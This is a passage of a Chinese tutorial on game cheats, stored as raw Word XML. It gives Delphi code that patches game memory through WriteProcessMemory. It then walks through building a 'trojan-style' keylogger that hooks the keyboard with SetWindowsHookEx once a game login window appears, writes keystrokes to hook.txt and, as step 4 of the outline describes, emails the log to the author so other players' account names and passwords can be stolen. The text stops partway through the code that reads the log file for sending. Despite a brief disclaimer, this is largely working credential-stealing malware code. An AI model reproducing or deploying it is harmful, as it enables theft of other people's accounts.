        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、下面用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CloseHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭进程句柄就完成了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏的外挂代码，我们照上面的方法对应去研究一下吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>const</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>ResourceOffset: dword = $004219F4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>resource: dword = 3113226621;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>ResourceOffset1: dword = $004219F8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>resource1: dword = 1940000000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>ResourceOffset2: dword = $0043FA50;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>resource2: dword = 1280185;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>ResourceOffset3: dword = $0043FA54;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>resource3: dword = 3163064576;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ResourceOffset4: dword = $0043FA58;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>resource4: dword = 2298478592;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>hw: HWND;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>pid: dword;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>h: THandle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>tt: Cardinal;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>hw := FindWindow(&amp;#39;XX&amp;#39;, nil);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if hw = 0 then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>Exit;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>GetWindowThreadProcessId(hw, @pid);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if h = 0 then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>Exit;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if flatcheckbox1.Checked=true then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if flatcheckbox2.Checked=true then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>MessageBeep(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>CloseHandle(h);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">close; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　木马式外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在，所以今天不得不说一下（我个人是非常讨厌这类外挂的，请看过本文的朋友不要到处乱用此技术，谢谢合作）。要做此类外挂的程序实现方法很多（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，键盘监视等技术），因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术对程序员的技术要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>比较高并且在实际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件就能实现做到后台键盘监视，这个程序用这种技术来实现比较适合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在做程序之前我们必需要了解一下程序的思路：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们首先知道你想记录游戏的登录窗口名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、判断登录窗口是否出现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、如果登录窗口出现，就记录键盘。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始，我们就开始这类外挂的程序实现之旅：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数就可以很轻松的实现了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HWND FindWindow(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPCTSTR lpClassName, // pointer to class name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>LPCTSTR lpWindowName // pointer to window name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　实际程序实现中，我们要找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;#39;xx&amp;#39;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窗口，就用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindWindow(nil,&amp;#39;xx&amp;#39;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果当返回值大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　先首我们用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetWindowsHookEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置监视日志，而该函数的用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HHOOK SetWindowsHookEx(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>int idHook, // type of hook to install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HOOKPROC lpfn, // address of hook procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HINSTANCE hMod, // handle of application instance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">DWORD dwThreadId // identity of thread to install hook for </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　在这里要说明的是在我们程序当中我们要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOKPROC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们要通过写一个函数，来实现而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HINSTANCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们直接用本程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HINSTANCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以了，具体实现方法为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOKPROC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的函数就要复杂一点点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if findedtitle then file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果发现窗口后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if (peventmsg(lparam)^.message = WM_KEYDOWN) then file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息等于键盘按下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keyhookresult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（自定义的函数，主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的）转换消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if length(hookkey) &gt; 0 then file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果获得按键名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Write(hookkeyFile,hookkey); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把按键名称写入文本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">hookkey := &amp;#39;&amp;#39;; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UnHookWindowsHookEx(hHook)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hHOOK,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setwindowshookex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后所返回的句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其他发送这块并不是很难，只要把记录从文本文件里边读出来，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DELPHI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带的电子邮件组件发一下就万事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>assignfile(ReadFile,&amp;#39;hook.txt&amp;#39;); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
